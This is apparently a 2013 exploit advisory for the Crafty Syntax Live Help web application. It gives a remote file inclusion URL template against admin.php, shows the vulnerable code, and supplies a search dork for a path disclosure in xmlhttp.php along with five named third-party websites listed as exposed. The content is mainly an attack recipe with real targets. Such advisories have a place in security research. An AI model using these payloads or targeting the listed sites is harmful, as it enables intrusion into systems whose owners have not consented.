# Exploit Title : Crafty Syntax Live Help <= (2.*.* & 3.*.*) RFI + Path Disclosure # Date : 4/19/2013 # Author : ITTIHACK # Home : http://ittihack.com # Vendor : http://www.craftysyntax.com # Download : http://www.craftysyntax.com/craftysyntax3.4.1.zip # Version : 2.* and 3.* , All versions # Category : webapps # Google dork : NA # Tested on : Windows 7 + Apache server # Description :Crafty Syntax Live Help is a live support application. highlighted features include the ability to create your own questions, auto inviting visitors, referrer tracking, page tracking.. and more =========================================================================== 1) Remote File Include : admin.php if(!(isset($UNTRUSTED['page']))){ $UNTRUSTED['page'] = "scratch.php"; } http://localhost/path/admin.php?page=[RFI] =========================================================================== 2) Full Path Disclosure: xmlhttp.php Dork: inurl:"/xmlhttp.php" Notice: Undefined index: whattodo in http://www.roderickrowser.com/livehelp/xmlhttp.php http://www.rupeemail.net/livehelp/xmlhttp.php http://www.michaelroselli.com/cslh/xmlhttp.php http://www.recomende.com/ajuda/xmlhttp.php http://www.camilodossantos.com.br/suporte/xmlhttp.php